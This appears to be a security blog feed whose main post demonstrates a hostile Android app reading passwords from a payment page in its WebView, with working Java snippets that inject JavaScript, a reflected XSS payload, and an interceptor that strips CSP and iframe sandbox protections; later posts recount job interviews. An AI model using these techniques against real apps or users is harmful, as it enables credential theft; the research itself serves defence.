Android Webview Exploited

Tue, 24 Mar 2020 07:23:33 GMT

There are plenty of articles explaining the security issues with android webview, like this article & this one. Many of these resources talk about the risks that an untrusted page, loaded inside a webview, poses to the underlying app. The threats become especially prominent when javascript and/or the javascript interface is enabled on the webview.

In short, having javascript enabled & not properly fortified allows for the execution of arbitrary javascript in the context of the loaded page, making it quite similar to any other page that may be vulnerable to an XSS. And, very simply put, having the javascript interface enabled allows for potential code execution in the context of the underlying android app.

In many of the resources that I came across, the situation was such that the victim was the underlying android app, inside whose webview a page would open either from its own domain or from an external source/domain. The attacker was an entity external to the app, like an actor exploiting a potential XSS on the page loaded from the app's domain (or the third-party domain from where the page is being loaded, itself acting maliciously). The attack vector was the vulnerable/malicious page loaded in the webview.

This blog talks about a different attack scenario!

Victim: Not the underlying android app, but the page itself that is being loaded in the webview.

Attacker: The underlying android app, in whose webview the page is being loaded.

Attack vector: The vulnerable/malicious page loaded in the webview (through the abuse of insecure implementations of some APIs).

The story line

A certain product needs to integrate with a huge business. Let us call the huge business BullyGiant & the product AppAwesome from this point on.

Many users have an account on both AppAwesome & BullyGiant. The flow involves such users of BullyGiant checking out on their payments page with AppAwesome. Every transaction on AppAwesome requires the user to authenticate & authorize it by entering their password on AppAwesome's checkout page, which appears before any transaction is allowed to go through.

AppAwesome cares about the security of its customers. So it proposes the below security measures to anyone who wants to integrate with them, especially around AppAwesome's checkout page.

  1. Loading of the checkout page using AppAwesome's SDK. All of the page & its contents are sandboxed & controlled by the SDK. This approach allows for maximum security & the best user experience.
  2. Loading of the checkout page in the underlying browser (or Custom Chrome Tabs, if available). This approach again has quite decent security (limited, of course, by the underlying browser's security) but not a very good user experience.
  3. Loading of the checkout page in the webview of the integrating app. This is comparatively the most insecure of the above proposals, although it offers a better user experience than the second approach mentioned above.

Now the deal is that AppAwesome is really keen on securing its own customers' financial data & hence very strongly recommends usage of its SDK. BullyGiant on the other hand, for some (hopefully justified) reason, does not really want to abide by the secure integration proposals from AppAwesome. AppAwesome does have the choice to deny any integration with BullyGiant. However, this integration is really crucial for AppAwesome to provide a superior user experience to its own users & in fact even more crucial for AppAwesome to stay in the game.

So AppAwesome gives in & agrees to integrate with BullyGiant on their terms of integration, i.e. using the least secure webview approach. The only thing that protects AppAwesome's customers now is the trust that AppAwesome has in BullyGiant, which is also somewhat covered through the legal contracts between AppAwesome & BullyGiant. That's all.

Technical analysis (TL;DR)

Thanks to Badshah & Anoop for helping with the execution of the attack idea. Without your help, this blog post would not have been possible, at least not while it's still relevant :)

Below is a tech analysis of why webview is a bad idea. It talks about how a spurious (or compromised) app can abuse webview features to extract sensitive data from the page loaded inside the webview, despite the many security mechanisms that the page being loaded in the webview might have implemented. We discuss in detail, with many demos, how CSP, iframe sandbox etc. may be bypassed in android webview. Every single demo has a linked code base on my Github so they can be tried out first hand. Also, the below generic scheme is followed (not strictly in that order) throughout the blog:

  1. A simple demo of the underlying concepts on the browser & android webview
  2. Addition of security features to the underlying concepts & then demo of the same on the browser & android webview
NB: Please ignore all other potential security issues that might be there with the code base/s

Case 1: No protection mechanisms

Apps used in this section:

  1. AppAwesome
  2. BullyGiant

AppAwesome when accessed from a normal browser:

Vanilla AppAwesome Landing Page - Browser

And on submitting the above form:

Vanilla AppAwesome Checkout Page - Browser

AppAwesome when accessed from BullyGiant app:

Vanilla AppAwesome Page - Android Webview

Notice the Authenticate Payment web page is loaded inside a webview of the BullyGiant app.

And on submitting the form above:

Vanilla AppAwesome Page - Android Webview

Notice that clicking the Submit button also displays the content of the password field as a toast message in BullyGiant. This shows how the underlying app can sniff any data (sensitive or otherwise) from the page loaded in its webview.

Under the BullyGiant hood

The juice of why BullyGiant was able to sniff the password field out of the webview is that it is in total control of its own webview & hence can change the webview's properties, listen to events etc. That is exactly what it is doing. It is

  1. enabling javascript on its webview &
  2. then listening for the onPageFinished event

Snippet from BullyGiant:

    ...
    final WebView mywebview = (WebView) findViewById(R.id.webView);
    mywebview.clearCache(true);
    mywebview.loadUrl("http://192.168.1.38:31337/home");
    mywebview.getSettings().setJavaScriptEnabled(true);
    mywebview.setWebChromeClient(new WebChromeClient());
    mywebview.addJavascriptInterface(new AppJavaScriptProxy(this), "androidAppProxy");
    mywebview.setWebViewClient(new WebViewClient(){
        @Override
        public void onPageFinished(WebView view, String url) {...}
    ...

Note that there is addJavascriptInterface as well. This is what many blogs (quoted at the beginning of this post) talk about, where the loaded web page can potentially be harmful to the underlying app. In our use case however, it is not of much consequence (from that perspective). All that it is used for is to show that BullyGiant could read the contents of the page loaded in the webview. It does so by sending the read content back to android (that's where addJavascriptInterface is used) & having it displayed as a toast message.
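For completeness, a minimal sketch of what such a bridge class might look like (hypothetical — the actual AppJavaScriptProxy source is not shown in this post; the class name and showMessage method are taken from the snippets above):

```
// Hypothetical sketch of the class registered via addJavascriptInterface.
// Methods must be annotated with @JavascriptInterface (API 17+) to be
// callable from page JS as androidAppProxy.showMessage(...).
public class AppJavaScriptProxy {
    private final Activity activity;

    AppJavaScriptProxy(Activity activity) {
        this.activity = activity;
    }

    @JavascriptInterface
    public void showMessage(final String message) {
        // Toasts must be shown on the UI thread
        activity.runOnUiThread(() ->
                Toast.makeText(activity, message, Toast.LENGTH_LONG).show());
    }
}
```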

The other important bit in the BullyGiant code base is the overridden onPageFinished():

    ...
    super.onPageFinished(view, url);
    mywebview.loadUrl("javascript:var button = document.getElementsByName(\"submit\")[0];button.addEventListener(\"click\", function(){ androidAppProxy.showMessage(\"Password : \" + document.getElementById(\"password\").value); return false; },false);");
    ...

That's where the javascript to read the password field from the DOM is injected into the page loaded inside the webview.

The story line continued...

AppAwesome came up with the below suggestions to prevent the web page from being read by the underlying app:

Suggestion #1: Use CSP

Use CSP to prevent BullyGiant from executing any javascript whatsoever inside the loaded page
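For reference, a minimal example of what such a policy header could look like (the directives here mirror the ones that show up later in the adb logs of the demos; treat it as an illustrative sketch, not AppAwesome's exact policy):

```
Content-Security-Policy: script-src 'self' http://192.168.1.35:31337
```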

Suggestion #2: Use Iframe Sandbox

Load the sensitive page inside of an iframe on the main page in the webview. Use iframe sandbox to restrict any interactions between the parent window/page & the iframe content.
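As an illustration, a sandboxed iframe might look like the below (this mirrors the markup used in the demos later in the post):

```
<iframe src="http://192.168.1.34:31337/child?secret=iframeData" id="myIframe"
        sandbox="allow-scripts allow-top-navigation allow-forms allow-popups">
</iframe>
```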

CSP is a mechanism to prevent the execution of untrusted javascript inside a web page, while the sandbox attribute of an iframe is a way to tighten the controls on the page within the iframe. It's very well explained in many resources like here.

With all the above restrictions imposed, our goal now would be to see whether BullyGiant can still access the AppAwesome page loaded inside the webview. We would go about analyzing how each of the suggested solutions works in a normal browser & in a webview & how BullyGiant could access the loaded pages, if at all.

Exploring CSP With Inline JS

Apps used in this section:

  1. AppAwesome
  2. BullyGiant

Before moving on to the demo of the CSP implementation & its effect/s on android webview, let's look at how a non-CSP page behaves in a normal (non-webview) browser & a webview.

To demo this we have added inline JS that would alert 1 when the Submit button is clicked, before proceeding to the checkout success page. AppAwesome code snippet:

<!DOCTYPE HTML>
    ...
    <script type="text/javascript">
      function f(){
        alert(1);
      }
    </script>
    ...
      <input type="submit" value="Submit" name="submit" onclick="f();">
    ...
</html>

AppAwesome when accessed from the browser & when Submit button is clicked:

Vanilla AppAwesome Page - Inline JS => Firefox 74.0

AppAwesome when accessed from BullyGiant app:

Vanilla AppAwesome Page - Inline JS => Android Webview

The above suggests that, so far, there is no change in how the page is treated by the two environments. Now let's check the change in behavior (if any) when CSP headers are implemented.

With CSP Implemented

Apps used in this section:

  1. AppAwesome
  2. BullyGiant

Browser

A quick demo of these features on a traditional browser (not webview) suggests that these controls are indeed useful (when implemented the right way) for what they are intended to do.

AppAwesome when accessed from a browser:

CSP AppAwesome page - Inline JS => Firefox 74.0

Notice the Content Security Policy violations. These violations happen because of the CSP response headers, returned by the backend & enforced by the browser.

Response headers from AppAwesome:

CSP AppAwesome page - Inline JS => Firefox 74.0

Android Webview

AppAwesome when accessed from BullyGiant gives the same Authenticate Payment page as above & the exact same CSP errors too! This can be seen in the below screenshot of a remote debugging session taken from Chrome 80.0:

(Firefox was not chosen for remote debugging because I was too lazy to set up remote debugging on Firefox; a Firefox set-up on the AVD would have been required too :( as per this from the FF settings page. Also, further down, for all the demos we use adb logs instead of remote debugging sessions to show browser console messages.)

On Google Chrome 80.0

Hence, we see that CSP does prevent the execution of inline JS inside android webview, very much like a normal browser does.

Exploring CSP With Injected JS

Apps used in this section:

  1. AppAwesome
  2. AppAwesome (with XSS-Auditor disabled)
  3. BullyGiant (without XSS payload)
  4. BullyGiant (with XSS payload)

AppAwesome has been made deliberately vulnerable to a reflected XSS through a query parameter, name, added to the home page. Also, all inline JS has been removed from this page to further emphasize CSP's impact on injected JS.

AppAwesome when accessed from the browser while the name query parameter's value is John Doe:

On Google Chrome 80.0

Now, for the sake of the demo, we would exploit the XSS-vulnerable name query param to add an onclick event to the Submit button such that clicking it would alert "injected 1".

XSS exploit payload

<body onload="f()"><script type="text/javascript">function f(){var button=document.getElementsByName("submit")[0];button.addEventListener("click", function(){ alert("injected 1"); return false; },false);}</script>

AppAwesome when accessed from the browser & exploited with the above payload (in name query parameter):

Vanilla AppAwesome Page - Exploited XSS => Firefox

AppAwesome when accessed from BullyGiant, without exploiting the XSS:

Vanilla AppAwesome Page - Vulnerable param => Android Webview

AppAwesome when accessed from BullyGiant, while attempting to exploit the XSS, produces the same screen as above. However, contrary to the script injection that was successful in the case of a normal browser, this time clicking on the Submit button didn't execute the payload at all; we were instead taken directly to the checkout page. The adb logs however did produce an interesting message, as shown below:

Vanilla AppAwesome Page - Exploited XSS => Android Webview

The adb log message is:

03-27 12:29:33.672 26427-26427/com.example.webviewinjection I/chromium: [INFO:CONSOLE(9)] "The XSS Auditor refused to execute a script in 'http://192.168.1.35:31337/home?name=<body onload="f()"><script type="text/javascript">function f(){var button=document.getElementsByName("submit")[0];button.addEventListener("click", function(){ alert("injected 1"); return false; },false);}%3C/script%3E' because its source code was found within the request. The auditor was enabled as the server sent neither an 'X-XSS-Protection' nor 'Content-Security-Policy' header.", source: http://192.168.1.35:31337/home?name=<body onload="f()"><script type="text/javascript">function f(){var button=document.getElementsByName("submit")[0];button.addEventListener("click", function(){ alert("injected 1"); return false; },false);}%3C/script%3E (9)

So even without any explicit protection mechanism (like CSP or iframe sandbox), android webview seems to have a default protection mechanism called the XSS Auditor. This however has nothing to do with our use case. Moreover, it hinders our demo as well. Hence, for now, for the sake of this demo, we would make AppAwesome return the X-XSS-Protection HTTP header, as below, to take care of this issue.

X-XSS-Protection: 0

Note: As an auxiliary, a bypass of the XSS Auditor will also be covered towards the end of the blog :)

AppAwesome when accessed now from BullyGiant, while attempting to exploit the XSS:

Vanilla AppAwesome Page - Exploited XSS => Android Webview

Thus we see that the XSS payload works equally well even in the Android Webview (of course with the XSS Auditor intentionally disabled).

Note: If the victim is the page getting loaded inside the webview, it makes absolute sense that its backend would never return any HTTP headers, like the above, that weaken the security of the page itself. We will see why this is irrelevant further down.

The other thing to note is that there was a subtle difference in how the payloads were injected into the vulnerable parameter in the two cases, the browser & the webview. It is important to take note of it because it highlights the very premise of this blog post. In the case of the browser, the attacker is an external party who sends the JS payload to exploit the vulnerable name parameter. Whereas in the case of the android webview, the underlying app itself is the malicious actor & hence it injects the JS payload into the vulnerable name parameter before loading the page in its own webview. This difference becomes more prominent as we analyze further cases & how the malicious app leverages its capabilities to exploit the page loaded in the webview.
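To make that difference concrete: in the webview case the app itself assembles the exploit URL before handing it to loadUrl(). A plain-Java sketch of just that URL construction (buildExploitUrl is a hypothetical helper; the host and parameter names mirror the demo setup in this post):

```java
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;

public class ExploitUrlBuilder {

    // Hypothetical helper: URL-encode the XSS payload into the vulnerable
    // `name` query parameter before the URL is loaded in the webview.
    static String buildExploitUrl(String base, String param, String payload) {
        return base + "?" + param + "="
                + URLEncoder.encode(payload, StandardCharsets.UTF_8);
    }

    public static void main(String[] args) {
        // Abbreviated stand-in for the real payload shown earlier
        String payload = "<body onload=\"f()\"><script>/* ... */</script>";
        System.out.println(buildExploitUrl(
                "http://192.168.1.35:31337/home", "name", payload));
    }
}
```

In the real attack this string would simply be passed to mywebview.loadUrl(...), which is why no external delivery mechanism is needed at all.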

With CSP Implemented

Apps used in this section:

  1. AppAwesome
  2. BullyGiant (with XSS payload)
  3. BullyGiant (with CSP bypass)
  4. BullyGiant (with CSP bypass reading the password field)

Browser

With the appropriate CSP headers in place, inline JS does not work in browsers, as we saw above. What would happen if javascript were injected into a page that has CSP headers? Would it still produce CSP violation errors?

AppAwesome, with the vulnerable name parameter & the XSS Auditor disabled, when accessed in the browser with the name query param exploited with the same XSS payload (as earlier):

CSP AppAwesome Page - Exploited XSS => Firefox

The console error messages are the same as with inline JS. Injected JS does not get executed as the CSP policy prevents it. Would the same XSS payload work when the above CSP page is loaded inside android webview?

AppAwesome when accessed from BullyGiant app that injects the JS payload in the vulnerable name parameter before loading the page in the android webview:

CSP AppAwesome Page - Exploited XSS => Android Webview

The same adb log is produced, confirming that CSP works well even for injected javascript payloads inside a webview.

Note: In the CSP-related examples above (browser or webview), CSP kicks in before the page actually gets loaded.

With the above note, some interrelated questions that arise are:

  1. What would happen if BullyGiant wanted to access the contents of the page after it gets successfully loaded?
  2. Could it add javascript to the already loaded page, as if this were being done locally?
  3. Would CSP still interfere?

Since the webview is under the total control of the underlying app, in our case BullyGiant, & since there are android APIs available to control the lifecycle of pages loaded inside the webview, BullyGiant can pretty much do whatever it wants with the loaded page's contents. So instead of injecting the javascript payload into the vulnerable parameter, as in the above example, BullyGiant may choose to inject it directly into the page itself after the page is loaded, without needing to exploit the vulnerable name parameter at all.

AppAwesome when accessed from BullyGiant that implements the above trick to achieve JS execution despite CSP:

CSP AppAwesome Page - Exploited XSS => Android Webview

The logs still show the below messages:

03-28 17:29:28.372 13282-13282/com.example.webviewinjection D/WebView Console Error:: Refused to execute inline script because it violates the following Content Security Policy directive: "script-src 'self' http://192.168.1.35:31337". Either the 'unsafe-inline' keyword, a hash ('sha256-JkQD9ejf-ohUEh1Jr6C22l1s4TUkBIPWNmho0FNLGr0='), or a nonce ('nonce-...') is required to enable inline execution.
03-28 17:29:28.396 13282-13282/com.example.webviewinjection D/WebView Console Error:: Refused to execute inline event handler because it violates the following Content Security Policy directive: "script-src 'self' http://192.168.1.35:31337". Either the 'unsafe-inline' keyword, a hash ('sha256-...'), or a nonce ('nonce-...') is required to enable inline execution.

BullyGiant still injected the XSS payload into the vulnerable name parameter (we left it there to ensure that CSP was still in action). The above logs are a result & proof of that.

Code snippet from BullyGiant that does the trick:

        ...
        mywebview.setWebViewClient(new WebViewClient(){
            @Override
            public void onPageFinished(WebView view, String url) {
                super.onPageFinished(view, url);
                mywebview.loadUrl(
                        "javascript:var button = document.getElementsByName(\"submit\")[0];button.addEventListener(\"click\", function(){ alert(\"injected 1\"); },false);"
                );
            }
        });
        ...

The above PoC shows the execution of a simple JS payload that just pops up an alert box. Any other, more complex, JS could be executed as well, like reading the contents of the password field on the page using the below payload:

var secret = document.getElementById("password").value; alert(secret);

AppAwesome when accessed from BullyGiant that attempts to read the password field using the above payload:

CSP AppAwesome Page - Exploited XSS => Android Webview

So the questions above get answered. This is also indicative of an even more interesting question now:

Since BullyGiant is in total control of the webview & thus the page loaded within it, would it also be able to modify the whole HTTP response itself?

We will tackle the above question with yet another example. In fact, this time we would talk about the second suggestion, around iframe sandbox, and see if the answer to the above question can be demoed with that. Also, we had left the whole X-XSS-Protection header thing for later. That part will also get covered in the following experiments.

Iframe sandbox attribute

Apps used in this section:

  1. AppAwesome Backend (without CSP & with iframe sandbox)
  2. AppAwesome Backend (without CSP & with iframe sandbox relaxed)
  3. BullyGiant

AppAwesome, with no CSP headers, with X-XSS-Protection relaxed & with the below sandbox attribute

sandbox="allow-scripts allow-top-navigation allow-forms allow-popups"

when loaded in the browser:

AppAwesome Page - Iframe Sandbox => Browser

The child page has the form, which when submitted displays the password on the checkout page inside the iframe:

AppAwesome Page - Iframe Sandbox => Browser

The Access button tries to read the password displayed inside the iframe by reading the DOM of the page loaded in the iframe, using the below JS:

...
    <script type="text/javascript">
      function accessIframe()
      {
        document.getElementById('myIframe').style.background = "green";
        alert(document.getElementById('myIframe').contentDocument.getElementById('data').innerText);
      }
    </script>
...

Note that even in the absence of CSP headers, clicking the Access button gives:

AppAwesome Page - Iframe Sandbox => Browser

The console message is:

TypeError: document.getElementById(...).contentDocument is null

This happens because of the iframe's sandbox attribute. The iframe sandbox can be relaxed by using:

<iframe src="http://192.168.1.34:31337/child?secret=iframeData" frameborder="10" id="myIframe" sandbox="allow-same-origin allow-top-navigation allow-forms allow-popups">

AppAwesome, with the relaxed iframe sandbox attribute, allows the JS in the parent page to access the iframe's DOM, thus producing the alert box as expected, with the mysecret value:

AppAwesome Page - Iframe Sandbox => Browser

Also, just as a side note, using the below would have relaxed the sandbox to the exact same effect, as has also been mentioned here:

<iframe src="http://192.168.1.34:31337/child?secret=iframeData" frameborder="10" id="myIframe" sandbox="allow-scripts allow-same-origin allow-top-navigation allow-forms allow-popups">

Repeating the same experiment on android webview produces the exact same results.

AppAwesome, with the relaxed iframe sandbox attribute, when accessed from BullyGiant:

AppAwesome Page - Iframe Sandbox Relaxed => Android Webview

AppAwesome, with no CSP headers, with X-XSS-Protection relaxed & with the below sandbox attribute

sandbox="allow-scripts allow-top-navigation allow-forms allow-popups"

when accessed from BullyGiant:

AppAwesome Page - Iframe Sandbox => Android Webview

The error message in the console is:

03-29 15:18:38.292 11081-11081/com.example.webviewinjection D/WebView Console Error:: Uncaught SecurityError: Failed to read the 'contentDocument' property from 'HTMLIFrameElement': Sandbox access violation: Blocked a frame at "http://192.168.1.34:31337" from accessing a frame at "http://192.168.1.34:31337".  The frame being accessed is sandboxed and lacks the "allow-same-origin" flag.

Now if BullyGiant were to bypass the above restriction, like it did in the case of the CSP bypass, it could again take the same route of injecting some javascript inside the iframe itself after the checkout page is loaded.

Note: I haven't personally tried this approach, but conceptually it should work. Too lazy to do that right now !

But instead of doing that, what if BullyGiant were to take an even simpler approach and bypass everything once & for all? Since the webview is under the total control of BullyGiant, could it not intercept the response before rendering it in the webview and remove all the trouble-making headers altogether?

Manipulation of the HTTP response

Apps used in this section:

  1. AppAwesome Backend (with all protection mechanisms in place)
  2. BullyGiant (that bypasses all the above mechanisms)
  3. BullyGiant app with a toast

Let's make this case the most secure of all the previous ones. So this time AppAwesome implements all the secure mechanisms on the page. Below is a list of such changes:

  1. It uses CSP => so that no unwanted JS (inline or injected) could be executed.
  2. It uses strict iframe sandbox attributes => so that the parent page cannot access the contents of the iframe despite them being from the same domain.
  3. It does not set the X-XSS-Protection: 0 header => this was an assumption we had made above for the sake of our demos. In the real world, an app that wishes to avoid an XSS scenario would deploy every possible/feasible mechanism to prevent it from happening. So AppAwesome now does not return this header at all.
  4. It does not have the Access button in the DOM with the supporting inline JS => again something that we had used in a few of our (most recent) previous examples for the sake of our demo. In the real world, in the context of our story, it would not make sense for AppAwesome to leave an Access button with the supporting inline JS to access the iframe.

AppAwesome when accessed from the browser:

AppAwesome Page - FullBlown => Browser

Notice that all the security measures mentioned in the pointers above are implemented. CSP headers are in place, there's no Access button or the supporting inline JS, no X-XSS-Protection header & the strict iframe sandbox attribute is present as well.

BullyGiant handles all of the above trouble makers by manipulating everything before any response is rendered onto the webview at all.

AppAwesome 0, BullyGiant 1!

AppAwesome when accessed from BullyGiant:

AppAwesome Page - FullBlown => Android Webview

Notice that the X-XSS-Protection: 0 header has been added! The CSP header is no longer present! And there's (the old familiar) brand new Access button on the page as well. Clicking the Access button after the form inside the iframe is loaded gives:

AppAwesome Page - FullBlown => Android Webview

Code snippet from BullyGiant that does all of the above:

...
class ChangeResponse implements Interceptor {
    @Override public Response intercept(Interceptor.Chain chain) throws IOException {
        Response originalResponse = chain.proceed(chain.request());
        String responseString = originalResponse.body().string();
        Document doc = Jsoup.parse(responseString);
        doc.getElementById("myIframe").removeAttr("sandbox");
        MediaType contentType = originalResponse.body().contentType();
        ResponseBody body = ResponseBody.create(doc.toString(), contentType);

        return originalResponse.newBuilder()
                .body(body)
                .removeHeader("Content-Security-Policy")
                .header("X-XSS-Protection", "0")
                .build();
    }
};
...
...
    private WebResourceResponse handleRequestViaOkHttp(@NonNull String url) {
        try {
            final OkHttpClient client = new OkHttpClient.Builder()
                    .addInterceptor(new LoggingInterceptor())
                    .addInterceptor(new ChangeResponse())
                    .build();

            final Call call = client.newCall(new Request.Builder()
                    .url(url)
                    .build()
            );

            final Response response = call.execute();
            return new WebResourceResponse("text/html", "utf-8",
                    response.body().byteStream()
            );
        } catch (Exception e) {
            return null; // return response for bad request
        }
    }
...
...
       mywebview.setWebViewClient(new WebViewClient(){
            @SuppressWarnings("deprecation") // From API 21 we should use another overload
            @Override
            public WebResourceResponse shouldInterceptRequest(@NonNull WebView view, @NonNull String url) {
                return handleRequestViaOkHttp(url);
            }
...

What the above does is intercept the HTTP request that the webview would make & pass it over to OkHttp, which then handles all HTTP requests & responses from that point on, before finally returning the modified HTTP response back to the webview.
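The header manipulation at the core of this trick is trivial. A standalone plain-Java sketch of just that step, independent of OkHttp and the demo app (the header names are the real ones removed/added above; the defang helper is hypothetical):

```java
import java.util.LinkedHashMap;
import java.util.Map;

public class HeaderRewrite {

    // Strip the CSP header & force X-XSS-Protection: 0, mirroring what the
    // OkHttp interceptor above does to the intercepted HTTP response.
    static Map<String, String> defang(Map<String, String> headers) {
        Map<String, String> out = new LinkedHashMap<>(headers);
        out.remove("Content-Security-Policy");
        out.put("X-XSS-Protection", "0");
        return out;
    }

    public static void main(String[] args) {
        Map<String, String> h = new LinkedHashMap<>();
        h.put("Content-Security-Policy", "script-src 'self'");
        h.put("Content-Type", "text/html");
        System.out.println(defang(h));
        // prints: {Content-Type=text/html, X-XSS-Protection=0}
    }
}
```

Since the webview only ever sees the defanged headers, the browser engine has nothing to enforce, which is exactly why the page renders with no CSP violations at all.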

Ending note:

Before we end, a final touch. BullyGiant was able to access the whole of the page loaded inside the webview. This was demoed using JS alerts on the page itself. The content read from the webview could also be displayed as native toast messages, to make it more convincing for the business leaders (or anyone else), accentuating that the sensitive details from AppAwesome are actually leaked to BullyGiant.

AppAwesome when accessed from BullyGiant:

AppAwesome Page - FullBlown => Android Webview - Raising a toast!

Conclusion

Theoretically, since the webview is under the total control of the underlying android app, it is wise not to share any sensitive data on a page getting loaded inside a webview.

Collected on the way

git worktrees
what are git tags & how to maintain different versions using tags
creating git tags
checking out git tags
pushing git tags
tags can be viewed simply with git tag
git tags can not be committed to => for any changes to a tag, commit the changes on the same or a new branch and then make a tag out of it. Delete the old tag after that if you want
deleting a branch local & remote
rename a branch local & remote
adding chrome console messages to adb logs
chrome's remote debugging feature

That Dream Job

Tue, 11 Feb 2020 15:44:00 GMT

Not that I was desperately looking out for a change at this point in time, but appearing for the selection processes of different companies, for an information security role, has always been a brutal teacher. And although I was fortunate to crack some of those, I am particularly more delighted about the other kind, for those have been the real fun ones. And then of course, some names have always stirred a keen desire in me, even before I was eligible to be employed full-time, to get an opportunity to work with their teams and experience their brilliant culture and values. And trust me, for names like these, I don't really need to be 'desperately' looking out for a change. It's roles/companies like these that help me understand the term 'best' (which is otherwise quite vague and relative) and that I like to call a dream job.

LinkedIn happens to be one such phenomenon that I would readily be very positive about, from an employment perspective, unless of course I am already into something that's analogous to 'saving the world' or am already working with people like the above. Having like-minded friends is always a boon. Thanks to one such friend (Avradeep Bhattacharya), my profile caught the recruitment team's attention. What follows now is a narration of my personal experience with the entire selection process.

It might get a little too melodramatic. But that's how it was. You have been warned!

My friend confirmed that he had forwarded my profile to the respective hiring team on a Wednesday. The following Thursday is when I received an introductory email from the recruitment team at LinkedIn, which was soon followed by a call to discuss the opportunity and my interests further. A sweet mid-20s voice with an absolutely professional tone acknowledged my 'Hello' and off we went to the very first step of the selection procedure. I was briefed about the role, the kind of people I would be working with, the location etc. And I think I blabbered a lot about my experience and why exactly I was keen on this opportunity. (It was the excitement speaking, not me! :)) But I guess I did a fair job at it, because at the end of it, the lady at the other end seemed convinced and we ended on the note that the ball was now in the hiring manager's court and that if the manager saw my profile as a fit, I would be contacted back soon.

I ‘chillaxed’ while waiting for a call. The general idea is 2–3 days, or more sometimes (or sometimes no intimation at all), before you get the next call. But LinkedIn takes ‘soon’ quite literally. ‘Ping’ ! Within the next 30 minutes of the previous interaction, and an acceleration in beats per second. The next thing I knew, the next round had been arranged, as the hiring manager seemed interested in giving me a shot.

Round 1:

‘Soon’ again, there was a challenge that was shared with me. I was supposed to solve it and send back my thoughts about the same and possibly the solution too. I was given around 48 hours to complete the challenge. Now although the instructions in the challenge mentioned that ‘ideally’ it could be done within 2–3 hours at max, I wanted to take all the time available and, being the stubborn me, give it one shot after the other aiming at making it a little better each time.

Because it was and still is confidential as I understand, I may not be able to share the exact details of the challenge. However, I would like to share whatever I can within the scope of the non-disclosure. Getting started with the instructions file, the requirements and expectations were crystal clear. The challenge itself was quite the opposite, at least at first glance. It was not before some 30–45 minutes of dedicated poking and playing around that I got a basic grasp of what exactly I was dealing with. Dinner break. Later that same evening, between shots of dark caffeine, it took another 3–4 hours to finally come up with a working PoC that satisfied the bare minimum expectation. Sigh! “That was cool” is what reverberated till, I guess, I slept it over.

The following day, since I had all the time till the final hours, there was war on Stack Overflow, Facebook, numerous blogs and discussion forums etc. around things I kept exploring and asking and debating, to make the solution better and achieve what I wanted to. The challenge was not the challenge itself; it was the fact that the exact thing, being confidential, could not be shared. The questions had to be very vague and abstract and generic. And there was a lot of criticism and down votes around the questions I was asking. I could not have expected more. I mean, I was asking X in my questions and was trying to get an answer for Y. :) But at the end, although I did not receive the answer I was looking for, what I did come across through all the research was n number of ways of attempting what I was trying to do, and I finally realized that whatever I was trying to do was not feasible at all given the problem statement at hand. Cool right ? Anyway, the solution was finally submitted in the 11th hour. And as all 11th hour things ought to mess up, my submission was no exception either. First I missed the attachment in the email. Then I sent the wrong attachment in the second email.
And the final submission, with the right PoC attached, had slightly ambiguous instructions about how to run the PoC. :) But it soon hit me that 3 iterations for one mail is more than enough. And I just left it there.

Round 2:

‘Soon’ once again, my solution sailed me through to the next round.
A late night phone call was arranged with a senior engineer in the team, whose LinkedIn profile was shared beforehand. (The call was actually rescheduled for later that night, at my convenience, as the interviewer had to attend to some urgent stuff at the previously scheduled time.) The profile was pretty impressive. The intimidation was intense and so was my eagerness about the call. It was the high school exam days revisited, when you feel that you are prepared, yet you are all apprehensive.
It’s a quality I think a lot of folks have picked up at LinkedIn (or maybe it’s just a character you build with maturity): the guy’s voice was extremely polite and humble, yet absolutely professional. He gave a small introduction about himself and his role. I followed his cue and gave mine as well, this time ensuring that it was me doing the talking and not the excitement, trying to pick up something from the demeanor of the interviewer. Mostly the discussion revolved around an in-depth understanding of some very basic technologies. I was not very fast in answering them, because frankly I had to think about the questions and cross-questions that were thrown depending on my answers, but I guess I covered most of them at an ok pace. There was one question though that I could not answer despite making an attempt at it, because I did not know about that technical aspect at all.
It was a good discussion I would say, for I was forced to think through the problems given and not just produce an answer by the books. I could easily relate to real world problems through the situations that were presented by the interviewer. The questions all made perfect sense in that they encapsulated real world issues and were not just theoretical ones out of thin air.

Conclusion

This time it was a long wait. I was 80% sure of getting back an affirmative call and an entry into the next round of the process. Alas! LinkedIn had other plans. :) It being an extended weekend, I received a mail on the first working day following the long weekend informing me that the hiring team did not see me as a fit at that point in time for the opening. I am not certain even now where I missed it. As much as I would have liked to be promoted to the next round, I am certain there was reason enough to believe that I had something missing for that role. Upon request, I also received feedback from the LinkedIn hiring team about the areas I could improve on. But overall, I think the entire experience was really smooth and fun and, above all, pretty fruitful.

And of-course, I would still be looking out for one of these dream jobs, for if nothing, it is such experiences that really count.
Cheers ! :)

PS: Now that it's been almost 3+ years since I interviewed for this position, I will try to put up a tech blog post around the challenge itself as well.

]]>
<![CDATA[Yet Another Nice Discussion]]>http://localhost:2368/yet-another-nice-discussion/5e42c92bb9fad24fb261033fTue, 11 Feb 2020 15:40:24 GMTHow often are you greeted by one Cooper as you walk in for a discussion with your next potential employer ? Seldom, at least in the IT world. Oh, and in case Cooper didn’t really ring a bell, it’s a handsome, playful ball of Retriever fur we are talking about. We bonded at first sight, and if only Cooper could speak, no alternate job offer could ever have matched that. But guess it was better that way, for who knows, Cooper would have said, “Dude, seriously, stop playing with me and focus on your interview. It’s POSTMAN, not your regular stuff … woff ! woff ! “

So here’s another of those very unique and interesting experiences I had with the folks @POSTMAN. And if you’re a developer, either you already know of POSTMAN or you are just primitive, in which case here’s something to get you back to the future: https://www.getpostman.com/apps
Now although I have recently been lucky to have discussions, in person and over technology, with the class of people called co-founders of yet another phenomenon called start-ups, this one in particular was unique with respect to quite a few things (including Cooper of course).

To begin with, it was the first time ever that I actually witnessed firsthand what I had only heard of until now: revolutionary stuff all taking place in `that` magical garage. Be it Jobs’, Gates’, Bezos’ or that Menlo Park Google’s or Disney’s, all of these magical garages were the birthplace of some of the biggest names we know of today. POSTMAN clearly was not a garage, I guess primarily due to economic growth allowing entrepreneurs to move on and think outside the garage now, but it was not a picture that anyone would usually paint of an office, a corporate or even otherwise. An apartment with 2 floors, each having a 3 BHK flat, brewing with coffee and ideas, with the hall reserved for some COD, GOW, FIFA, WWE or Cooper time, the balcony overlooking the kitchen, and folks who were trying to figure out the age of a wine bottle, I suppose.

